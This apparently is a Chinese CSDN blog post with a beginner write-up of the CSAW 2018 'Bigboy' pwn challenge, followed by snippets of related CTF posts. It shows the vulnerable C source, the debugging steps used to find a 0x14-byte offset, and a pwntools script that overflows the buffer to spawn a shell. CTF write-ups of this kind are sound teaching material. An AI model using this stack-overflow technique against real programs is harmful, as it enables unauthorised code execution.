pwn入门第一题-Csaw 2018 Quals Bigboy

最新推荐文章于 2022-03-04 20:15:00 发布
最新推荐文章于 2022-03-04 20:15:00 发布
阅读量165 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/113472378
版权

题目链接
一道pwn50

查看源码

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void run_cmd(char * cmd){
    system(cmd);
}

int main(int argc, char ** argv){
    struct { //order enforcement from josh offsec
        char buf[17];
        int32_t x;
        int32_t y;
    } _holder = {
        {0},
        0xdeadbeef,
 	}; 
    puts("Are you a big boiiiii??");
    read(0,_holder.buf, 0x18);
    if (_holder.x == 0xcaf3baee)
        run_cmd("/bin/bash");
    else{
        run_cmd("/bin/date");
    }
    return 0;
}

read()函数有栈溢出
调试
在这里插入图片描述
断点打到read下一条指令
在这里插入图片描述
search-pattern 12345678 找到缓冲区
在这里插入图片描述查看缓冲区附近的栈内容
在这里插入图片描述
在这里插入图片描述
从12345678到deadbeef, 所以该缓冲区分配了8+ 8 + 4 = 20字节的空间, 即0x14

有了准确缓冲区大小, 就可以写exploit了, 目的是溢出覆盖_holder.x ← 0xcaf3baee, 就能绕过检查

from pwn import *
target = process('./boi')

payload = 'A' * 0x14 + p32(0xcaf3baee)
target.send(payload)
target.interactive()

用python2打, 一般的pwn都是用py2(大概)
在这里插入图片描述
拿到shell~

fa1c4
关注
专栏目录
pwn第一
bluestar628的博客
03-24 1844
今天听说了一个网站pwnable.kr。很适合初学者,就试着做了一道目。 第一目,按照网页上给的链接,使用putty链接工具联入。 输入ls命令查看文件内容。 很开心的看到了flag文件,于是直接打开,果然不出所料,我是没有权限打开的。然后查看了一下fd.c的代码。 #include #include #include char buf[32]; int main(in
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
2018-CSAW writeups
CODER的博客
11-11 473
第一次做这样的新目 做不出几道感觉无从下手 记录一下补情况 1.Twitch Plays Test Flag 思路:签到 answer:flag{typ3_y3s_to_c0nt1nue} 2.bin_t 思路:AVL树的插入 队友发现可以先去重再插入(用C++,写的多一点) 下面给了python的 调用别人写好的函数 https://github.com/pgrafov/pyth...
2018-09-18-csaw2018_pwn_wp.md
ZNYCSO的博客
09-25 450
layout: post title: “csaw2018_pwn_wp” date: 2018-09-18 categories: jekyll update csaw2018_pwn_wp pwn get_it 非常简单的直接栈溢出控制返回地址到system函数直接getshell from pwn import * context.log_level = &quot;debug&quot; local = ...
Pwn_4 Function Call
weixin_30569001的博客
02-18 77
main(){F1(arg1,arg2)…printf(); //这个printf 的地址就称为返回地址 return address}push arg2push arg1call F1在执行F1函数之前,首先要将返回地址入栈,然后进入函数。mov esp,ebppop ebpret非常关键的一张图 溢出后向下覆盖,覆盖返回地址ret addr函数执行完 EBP和ESP相等mov esp,ebp...
[BMZCTF-pwn] 12-csaw-ctf-2016-quals hungman
weixin_52640415的博客
02-13 2561
这个猜还是2.23 (都不打算作了,这上边的都没有远程环境,而且这些好像作过了) 这是个懵字游戏数据结构是这样的: chunk0 写输入的名字最大0xf8(可以小) 程序记录:4字节记录,4字节名字长度,8字节名字chunk0的指针 和名字一样长的随机数 先输入名字,然后行成随机数,然后等输入字符,如果有相同就计分,一共26个全输上怎么也能相同了,当超过最高记录就可修改名字(这里有溢出) puts("High score! change name?"); __isoc
[XCTF-pwn] 16_ciscn-2018-Quals-note-service2
weixin_52640415的博客
03-04 257
先查保护,有可写段: 这里有个问,在ubuntu20的系统下,这个rwx段是栈,也就是可以在栈里直接写代码。实际上这是在早些版本上运行的,堆也能执行。 ubuntu:~/xctf/016_ciscn-2018-Quals-note-service2$ checksec pwn [*] '/home/xctf/016_ciscn-2018-Quals-note-service2/pwn' Arch: amd64-64-little RELRO: Partial RELR
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018pwn shellcode 变形shellcode练手目,该目主要是利用三个节点来注入shellcode,考验解人对shellcode的熟悉程度。解:https://blog.csdn.net/A951860555/article/details/110350773
PWN入门之数组越界-附件资源
03-02
PWN入门之数组越界-附件资源
PWN入门之libc表-附件资源
03-05
PWN入门之libc表-附件资源
一道简单的入门pwn
m1785717的博客
09-07 9792
这是一道入门pwn 链接:https://pan.baidu.com/s/1vltSv8tJYrqKw8vATxwNYA 密码:f0qy 拿到先用file命令查看一下文件信息 可以看到是32-bit 的elf文件,用32位的IDA打开。 首先进入main函数,F5反编译后分析代码 定位到输入的参数&amp;s,可以看到参数s分配的空间。这一通过覆盖的方式执行_system...
Linux pwn入门教程(1)——栈溢出基础
dfdhxb995397的博客
06-29 703
作者:Tangerine@SAINTSEC 原文来自:https://bbs.ichunqiu.com/thread-42241-1-1.html 0×00 函数的进入与返回 要想理解栈溢出,首先必须理解在汇编层面上的函数进入与返回。首先我们用一个简单执行一次回显输入的程序hello开始。用IDA加载hello,定位到main函数后我们发现这个程序的逻辑十分简单,调用函数hello...
2015-CSAW-contacts [fmtstr in heap]
ACdream
03-05 1023
先尝试着找到漏洞点:fmtstr 在新建联系人时,如果在Description项中输入格式化字符串,在存在相应漏洞点 然后对应到:先Create,再Display,并定位到相关函数 程序开启了NX和Canary,来单步调试一下看看在漏洞点处发生了什么 Breakpoint 1, 0x08048c22 in ?? () gdb-peda$ stack 20 0000| 0xff...
pwntools中fmtstr的使用
fa1c4的blog
02-01 4150
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
kali安装checksec
fa1c4的blog
01-26 3445
git clone https://github.com/slimm609/checksec.sh.git cd checksec.sh sudo ln -s checksec /usr/local/bin/checksec 如果已存在checksec,用 sudo ln -sf checksec /usr/local/bin/checksec
[Windows] CVE-2011-2005 Afd.sys 本地提权漏洞复现
fa1c4的blog
01-26 3379
前言 这是一个微软在2011.10发布的补丁中提到的系统辅助驱动程序Afd.sys存在的本地提权漏洞, 影响到Windows XP, 和Windows Server 2003系统. 漏洞成因是Microsoft Windows Ancillary Function Driver(afd.sys)驱动程序没有完善检测用户提交的数据, 攻击者可以利用该漏洞执行任意代码. 漏洞分析 漏洞利用 总结 ...
Ubuntu16.04 pip安装pwntools出错
fa1c4的blog
02-23 3060
具体出错过程 Ubuntu16.04装pip, 然后用pip装pwntools会提示pip版本过低, 按给的命令更新之后pip就崩了 解决 先卸载pip https://blog.csdn.net/qq_33976344/article/details/113991528 然后下载文件进行安装 curl "https://bootstrap.pypa.io/get-pip.py" -o "get-pip.py" python3 get-pip.py python2 get-pip.py # 提示 ERR
BUUCTF pwn wp 81 - 85
fa1c4的blog
01-08 2976
wdb_2018_2nd_easyfmt int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[100]; // [esp+8h] [ebp-70h] BYREF unsigned int v4; // [esp+6Ch] [ebp-Ch] v4 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0);
Ubuntu安装checksec
fa1c4的blog
04-15 2709
环境配置, 纯命令行解决. # install git sudo apt-get install git ### cd git clone https://github.com/slimm609/checksec.sh sudo ln -sf ~/checksec.sh/checksec /usr/local/bin/checksec 经测试, 适用大部分版本Ubuntu.
Linux pwn零基础入门教程:环境配置到实战攻击
"i春秋月刊第六期的主深入探讨了Linux pwn(Privilege Escalation,权限提升)的零基础入门教程。该系列由Tangerine@SAINTSEC作者撰写,历时三个月精心编撰,旨在解决新手在Linux环境下攻破安全挑战时遇到的难,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值